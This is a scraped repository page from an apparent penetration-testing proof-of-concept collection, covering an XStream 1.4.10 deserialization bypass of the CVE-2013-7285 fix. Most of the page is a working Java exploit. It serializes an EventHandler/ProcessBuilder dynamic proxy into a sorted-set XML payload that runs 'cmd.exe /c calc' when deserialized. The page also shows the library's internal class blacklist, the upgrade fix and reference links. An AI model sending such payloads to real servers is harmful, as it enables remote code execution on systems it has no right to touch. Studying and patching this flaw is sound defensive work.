代码拉取完成,页面将自动刷新
同步操作将从 bughunt/Penetration_Testing_POC 强制同步,此操作会覆盖自 Fork 仓库以来所做的任何修改,且无法恢复!!!
确定后同步将在后台操作,完成时将刷新页面,请耐心等待。
XStream是常用的Java类库,用来将对象序列化成XML (JSON)或反序列化为对象。
Xstream 1.4.10版本存在反序列化漏洞CVE-2013-7285补丁绕过。
当使用Xstream 1.4.10版本且未对安全框架进行初始化时,攻击者即可通过精心构造的请求包在使用Xstream的服务器上进行远程代码执行。
Xstream
Xstream1.4.10版本
Xstream
package com.bigo;
import com.thoughtworks.xstream.XStream;
import java.beans.EventHandler;
import java.io.IOException;
import java.util.Set;
import java.util.TreeSet;
/**
* Created by cfchi on 2019/7/26.
*/
public class Main {
public static String expGen(){
XStream xstream = new XStream();
Set<Comparable> set = new TreeSet<Comparable>();
set.add("foo");
set.add(EventHandler.create(Comparable.class, new ProcessBuilder("calc"), "start"));
String payload = xstream.toXML(set);
System.out.println(payload);
return payload;
}
public static void main(String[] args) throws IOException {
expGen();
XStream xStream = new XStream();
String payload = "<sorted-set>\n" +
" <string>foo</string>\n" +
" <dynamic-proxy>\n" +
" <interface>java.lang.Comparable</interface>\n" +
" <handler class=\"java.beans.EventHandler\">\n" +
" <target class=\"java.lang.ProcessBuilder\">\n" +
" <command>\n" +
" <string>cmd.exe</string>\n" +
" <string>/c</string>\n" +
" <string>calc</string>\n" +
" </command>\n" +
" </target>\n" +
" <action>start</action>"+
" </handler>\n" +
" </dynamic-proxy>\n" +
"</sorted-set>\n";
xStream.fromXML(payload);
}
}
blacklist
private class InternalBlackList implements Converter {
private InternalBlackList() {
}
public boolean canConvert(Class type) {
return type == Void.TYPE || type == Void.class || !XStream.this.securityInitialized && type != null && (type.getName().equals("java.beans.EventHandler") || type.getName().endsWith("$LazyIterator") || type.getName().startsWith("javax.crypto."));
}
public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
throw new ConversionException("Security alert. Marshalling rejected.");
}
public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
throw new ConversionException("Security alert. Unmarshalling rejected.");
}
}
升级Xstream到1.4.11版本
https://mp.weixin.qq.com/s/bght8tIwtNqnaidVZjPdSw
http://x-stream.github.io/changes.html#1.4.11
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。